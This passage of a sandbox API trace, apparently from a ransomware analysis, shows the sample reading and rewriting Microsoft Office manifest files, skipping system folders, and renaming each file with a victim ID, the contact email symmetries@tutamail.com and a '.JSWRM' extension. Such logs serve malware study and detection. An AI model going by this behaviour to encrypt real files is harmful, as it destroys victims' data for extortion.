Size=0x17190) returned 0x24d210 [0101.823] ReadFile (in: hFile=0x45c, lpBuffer=0x24d210, nNumberOfBytesToRead=0x17190, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345ec04*=0x17190, lpOverlapped=0x0) returned 1 [0101.830] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.831] WriteFile (in: hFile=0x45c, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x17190, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345ec00*=0x17190, lpOverlapped=0x0) returned 1 [0101.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0101.831] CloseHandle (hObject=0x45c) returned 1 [0101.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0101.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0101.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0101.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0101.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0101.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0101.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.831] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.outlook.outlook.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.outlook.outlook.x-none.msi.16.x-none.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0101.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0101.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0101.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0101.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0101.832] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd36c4db5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd36c4db5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd3783951, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x17984, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RManifest.outlookmui.msi.16.en-us.xml", cAlternateFileName="C2C4E2~1.XML")) returned 1 [0101.832] lstrcmpiW (lpString1="C2RManifest.outlookmui.msi.16.en-us.xml", lpString2=".") returned 1 [0101.832] lstrcmpiW (lpString1="C2RManifest.outlookmui.msi.16.en-us.xml", lpString2="..") returned 1 [0101.833] lstrcmpiW (lpString1="C2RManifest.outlookmui.msi.16.en-us.xml", lpString2="...") returned 1 [0101.833] lstrcmpiW (lpString1="C2RManifest.outlookmui.msi.16.en-us.xml", lpString2="windows") returned -1 [0101.833] lstrcmpiW (lpString1="C2RManifest.outlookmui.msi.16.en-us.xml", lpString2="recovery") returned -1 [0101.833] lstrcmpiW (lpString1="C2RManifest.outlookmui.msi.16.en-us.xml", lpString2="perflogs") returned -1 [0101.833] lstrcmpiW (lpString1="C2RManifest.outlookmui.msi.16.en-us.xml", lpString2="documents and settings") returned -1 [0101.833] lstrcmpiW (lpString1="C2RManifest.outlookmui.msi.16.en-us.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.833] lstrcmpiW (lpString1="C2RManifest.outlookmui.msi.16.en-us.xml", lpString2="system volume information") returned -1 [0101.833] lstrcmpiW (lpString1="C2RManifest.outlookmui.msi.16.en-us.xml", lpString2="msocache") returned -1 [0101.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0101.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.outlookmui.msi.16.en-us.xml", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0101.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.outlookmui.msi.16.en-us.xml", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.outlookmui.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 39 [0101.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0101.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0101.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.outlookmui.msi.16.en-us.xml", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0101.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.outlookmui.msi.16.en-us.xml", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.outlookmui.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 39 [0101.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0101.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bb50 [0101.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0101.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b8f8 [0101.833] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.outlookmui.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.outlookmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.836] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=96644) returned 1 [0101.836] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x17980) returned 0x24d210 [0101.836] ReadFile (in: hFile=0x45c, lpBuffer=0x24d210, nNumberOfBytesToRead=0x17980, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345ec04*=0x17980, lpOverlapped=0x0) returned 1 [0101.844] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.844] WriteFile (in: hFile=0x45c, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x17980, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345ec00*=0x17980, lpOverlapped=0x0) returned 1 [0101.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0101.845] CloseHandle (hObject=0x45c) returned 1 [0101.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b830 [0101.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0101.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0101.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0101.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0101.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0101.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0101.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ef08 [0101.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0101.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0101.845] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.outlookmui.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.outlookmui.msi.16.en-us.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.outlookmui.msi.16.en-us.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.outlookmui.msi.16.en-us.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0101.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b830 | out: hHeap=0x1e0000) returned 1 [0101.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b8f8 | out: hHeap=0x1e0000) returned 1 [0101.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.856] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd257bc65, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd257bc65, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd27de170, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xafddc, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml", cAlternateFileName="C280EB~1.XML")) returned 1 [0101.856] lstrcmpiW (lpString1="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml", lpString2=".") returned 1 [0101.856] lstrcmpiW (lpString1="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml", lpString2="..") returned 1 [0101.856] lstrcmpiW (lpString1="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml", lpString2="...") returned 1 [0101.856] lstrcmpiW (lpString1="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml", lpString2="windows") returned -1 [0101.856] lstrcmpiW (lpString1="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml", lpString2="recovery") returned -1 [0101.856] lstrcmpiW (lpString1="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml", lpString2="perflogs") returned -1 [0101.856] lstrcmpiW (lpString1="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml", lpString2="documents and settings") returned -1 [0101.856] lstrcmpiW (lpString1="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.856] lstrcmpiW (lpString1="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml", lpString2="system volume information") returned -1 [0101.856] lstrcmpiW (lpString1="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml", lpString2="msocache") returned -1 [0101.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0101.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0101.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0101.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml", cchWideChar=58, lpMultiByteStr=0x20dde8, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml", lpUsedDefaultChar=0x0) returned 58 [0101.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0101.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0101.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0101.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0101.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml", cchWideChar=58, lpMultiByteStr=0x20d578, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml", lpUsedDefaultChar=0x0) returned 58 [0101.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0101.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b2b0 [0101.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bb50 | out: hHeap=0x1e0000) returned 1 [0101.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b650 [0101.857] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.powerpivot.powerpivot.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.857] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=720348) returned 1 [0101.857] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0101.857] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0101.870] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.870] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0101.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0101.871] CloseHandle (hObject=0x45c) returned 1 [0101.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bbc0 [0101.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0101.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0101.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x247a88 [0101.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x166) returned 0x1ff448 [0101.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0101.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.872] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.powerpivot.powerpivot.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.powerpivot.powerpivot.x-none.msi.16.x-none.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0101.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bbc0 | out: hHeap=0x1e0000) returned 1 [0101.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b650 | out: hHeap=0x1e0000) returned 1 [0101.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0101.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0101.873] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd26acf16, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd26acf16, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd290f4ec, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x195a4, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml", cAlternateFileName="C222CA~1.XML")) returned 1 [0101.873] lstrcmpiW (lpString1="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml", lpString2=".") returned 1 [0101.873] lstrcmpiW (lpString1="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml", lpString2="..") returned 1 [0101.873] lstrcmpiW (lpString1="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml", lpString2="...") returned 1 [0101.873] lstrcmpiW (lpString1="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml", lpString2="windows") returned -1 [0101.873] lstrcmpiW (lpString1="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml", lpString2="recovery") returned -1 [0101.873] lstrcmpiW (lpString1="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml", lpString2="perflogs") returned -1 [0101.873] lstrcmpiW (lpString1="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml", lpString2="documents and settings") returned -1 [0101.873] lstrcmpiW (lpString1="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.873] lstrcmpiW (lpString1="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml", lpString2="system volume information") returned -1 [0101.873] lstrcmpiW (lpString1="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml", lpString2="msocache") returned -1 [0101.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0101.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0101.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0101.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml", cchWideChar=58, lpMultiByteStr=0x20d578, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml", lpUsedDefaultChar=0x0) returned 58 [0101.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0101.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225190 [0101.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0101.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0101.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml", cchWideChar=58, lpMultiByteStr=0x20d920, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 